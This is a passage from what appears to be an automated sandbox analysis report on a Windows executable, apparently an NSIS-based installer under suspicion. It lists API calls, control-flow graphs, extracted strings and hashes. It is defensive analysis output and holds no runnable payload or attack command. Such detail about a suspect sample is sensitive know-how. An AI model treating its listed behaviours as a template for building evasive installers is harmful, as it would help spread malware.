                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                            • CloseClipboard.USER32 ref: 004057C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                            • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                            • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                            • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 499 4059a9-4059cf call 405c74 502 4059d1-4059e3 DeleteFileW 499->502 503 4059e8-4059ef 499->503 506 405b65-405b69 502->506 504 4059f1-4059f3 503->504 505 405a02-405a12 call 406297 503->505 507 405b13-405b18 504->507 508 4059f9-4059fc 504->508 512 405a21-405a22 call 405bb8 505->512 513 405a14-405a1f lstrcatW 505->513 507->506 511 405b1a-405b1d 507->511 508->505 508->507 514 405b27-405b2f call 4065da 511->514 515 405b1f-405b25 511->515 516 405a27-405a2b 512->516 513->516 514->506 523 405b31-405b45 call 405b6c call 405961 514->523 515->506 519 405a37-405a3d lstrcatW 516->519 520 405a2d-405a35 516->520 522 405a42-405a5e lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a64-405a6c 522->524 525 405b08-405b0c 522->525 539 405b47-405b4a 523->539 540 405b5d-405b60 call 4052ff 523->540 528 405a8c-405aa0 call 406297 524->528 529 405a6e-405a76 524->529 525->507 527 405b0e 525->527 527->507 541 405aa2-405aaa 528->541 542 405ab7-405ac2 call 405961 528->542 533 405a78-405a80 529->533 534 405aeb-405afb FindNextFileW 529->534 533->528 538 405a82-405a8a 533->538 534->524 537 405b01-405b02 FindClose 534->537 537->525 538->528 538->534 539->515 543 405b4c-405b5b call 4052ff call 40605d 539->543 540->506 541->534 544 405aac-405ab5 call 4059a9 541->544 552 405ae3-405ae6 call 4052ff 542->552 553 405ac4-405ac7 542->553 543->506 544->534 552->534 556 405ac9-405ad9 call 4052ff call 40605d 553->556 557 405adb-405ae1 553->557 556->534 557->534
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 004059D2
                                                                                            • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A1A
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A3D
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A43
                                                                                            • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A53
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-2816165867
                                                                                            • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                            • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                            • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                            • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 725 4065da-4065ee FindFirstFileW 726 4065f0-4065f9 FindClose 725->726 727 4065fb 725->727 728 4065fd-4065fe 726->728 727->728
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
                                                                                            • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                            Strings
                                                                                            • pOz, xrefs: 004065DB
                                                                                            • C:\Users\user\AppData\Local\Temp\nsu4899.tmp, xrefs: 004065DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp$pOz
                                                                                            • API String ID: 2295610775-3134192649
                                                                                            • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                            • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                            • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                            • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                                            • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                                            • Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                                            • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 190 403d35-403d47 191 403e88-403e97 190->191 192 403d4d-403d53 190->192 194 403ee6-403efb 191->194 195 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 191->195 192->191 193 403d59-403d62 192->193 196 403d64-403d71 SetWindowPos 193->196 197 403d77-403d7a 193->197 199 403f3b-403f40 call 40425a 194->199 200 403efd-403f00 194->200 195->194 196->197 204 403d94-403d9a 197->204 205 403d7c-403d8e ShowWindow 197->205 209 403f45-403f60 199->209 201 403f02-403f0d call 401389 200->201 202 403f33-403f35 200->202 201->202 223 403f0f-403f2e SendMessageW 201->223 202->199 208 4041db 202->208 210 403db6-403db9 204->210 211 403d9c-403db1 DestroyWindow 204->211 205->204 216 4041dd-4041e4 208->216 214 403f62-403f64 call 40140b 209->214 215 403f69-403f6f 209->215 219 403dbb-403dc7 SetWindowLongW 210->219 220 403dcc-403dd2 210->220 217 4041b8-4041be 211->217 214->215 226 403f75-403f80 215->226 227 404199-4041b2 DestroyWindow EndDialog 215->227 217->208 225 4041c0-4041c6 217->225 219->216 221 403e75-403e83 call 404275 220->221 222 403dd8-403de9 GetDlgItem 220->222 221->216 228 403e08-403e0b 222->228 229 403deb-403e02 SendMessageW IsWindowEnabled 222->229 223->216 225->208 231 4041c8-4041d1 ShowWindow 225->231 226->227 232 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 226->232 227->217 233 403e10-403e13 228->233 234 403e0d-403e0e 228->234 229->208 229->228 231->208 260 403fd5-403fda 232->260 261 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 232->261 238 403e21-403e26 233->238 239 403e15-403e1b 233->239 237 403e3e-403e43 call 4041e7 234->237 237->221 241 403e5c-403e6f SendMessageW 238->241 243 403e28-403e2e 238->243 239->241 242 403e1d-403e1f 239->242 241->221 242->237 247 403e30-403e36 call 40140b 243->247 248 403e45-403e4e call 40140b 243->248 258 403e3c 247->258 248->221 257 403e50-403e5a 248->257 257->258 258->237 260->261 
264 40401b-40401c 261->264 265 40401e 261->265 266 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050-404061 SendMessageW 266->267 268 404063 266->268 269 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 267->269 268->269 269->209 280 4040ae-4040b0 269->280 280->209 281 4040b6-4040ba 280->281 282 4040d9-4040ed DestroyWindow 281->282 283 4040bc-4040c2 281->283 282->217 285 4040f3-404120 CreateDialogParamW 282->285 283->208 284 4040c8-4040ce 283->284 284->209 287 4040d4 284->287 285->217 286 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->286 286->208 292 40417f-404192 ShowWindow call 40425a 286->292 287->208 294 404197 292->294 294->217
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                            • ShowWindow.USER32(?), ref: 00403D8E
                                                                                            • DestroyWindow.USER32 ref: 00403DA2
                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                            • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                                            • EnableWindow.USER32(?,?), ref: 00404011
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                            • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                            • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3282139019-0
                                                                                            • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                            • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                            • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                            • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 295 403987-40399f call 406671 298 4039a1-4039b1 call 4061de 295->298 299 4039b3-4039ea call 406165 295->299 308 403a0d-403a36 call 403c5d call 405c74 298->308 304 403a02-403a08 lstrcatW 299->304 305 4039ec-4039fd call 406165 299->305 304->308 305->304 313 403ac8-403ad0 call 405c74 308->313 314 403a3c-403a41 308->314 320 403ad2-403ad9 call 4062b9 313->320 321 403ade-403b03 LoadImageW 313->321 314->313 315 403a47-403a61 call 406165 314->315 319 403a66-403a6f 315->319 319->313 322 403a71-403a75 319->322 320->321 324 403b84-403b8c call 40140b 321->324 325 403b05-403b35 RegisterClassW 321->325 326 403a87-403a93 lstrlenW 322->326 327 403a77-403a84 call 405b99 322->327 339 403b96-403ba1 call 403c5d 324->339 340 403b8e-403b91 324->340 328 403c53 325->328 329 403b3b-403b7f SystemParametersInfoW CreateWindowExW 325->329 333 403a95-403aa3 lstrcmpiW 326->333 334 403abb-403ac3 call 405b6c call 406297 326->334 327->326 332 403c55-403c5c 328->332 329->324 333->334 338 403aa5-403aaf GetFileAttributesW 333->338 334->313 343 403ab1-403ab3 338->343 344 403ab5-403ab6 call 405bb8 338->344 348 403ba7-403bc1 ShowWindow call 406601 339->348 349 403c2a-403c2b call 4053d2 339->349 340->332 343->334 343->344 344->334 356 403bc3-403bc8 call 406601 348->356 357 403bcd-403bdf GetClassInfoW 348->357 352 403c30-403c32 349->352 354 403c34-403c3a 352->354 355 403c4c-403c4e call 40140b 352->355 354->340 358 403c40-403c47 call 40140b 354->358 355->328 356->357 361 403be1-403bf1 GetClassInfoW RegisterClassW 357->361 362 403bf7-403c1a DialogBoxParamW call 40140b 357->362 358->340 361->362 366 403c1f-403c28 call 4038d7 362->366 366->332
                                                                                            APIs
                                                                                              • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                              • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                            • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\You7ynHizy.exe",00000000), ref: 00403A08
                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF
                                                                                              • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                            • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                            • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                            • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 1975747703-4014211514
                                                                                            • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                            • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                            • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                            • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\You7ynHizy.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                              • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                              • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\You7ynHizy.exe,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\You7ynHizy.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                            • API String ID: 4283519449-1531417150
                                                                                            • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                            • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                                            • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                            • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
                                                                                            • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
                                                                                            • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
                                                                                            • API String ID: 717251189-3468386958
                                                                                            • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                            • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                            • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                            • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017B0
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017D5
                                                                                              • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                              • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                              • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp$C:\Users\user\AppData\Local\Temp\nsu4899.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 1941528284-417692713
                                                                                            • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                            • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                            • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                            • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                            • lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                            • lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                            • SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID: halituses
                                                                                            • API String ID: 2531174081-2845610232
                                                                                            • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                            • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                            • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                            • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph beginning at 406601; graph image not reproduced]
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                            • wsprintfW.USER32 ref: 00406653
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-1946221925
                                                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                            • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                            • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph beginning at 403116; graph image not reproduced]
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: ... %d%%
                                                                                            • API String ID: 551687249-2449383134
                                                                                            • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                            • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                                            • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                            • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph beginning at 4057ce; graph image not reproduced]
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                            • GetLastError.KERNEL32 ref: 00405825
                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
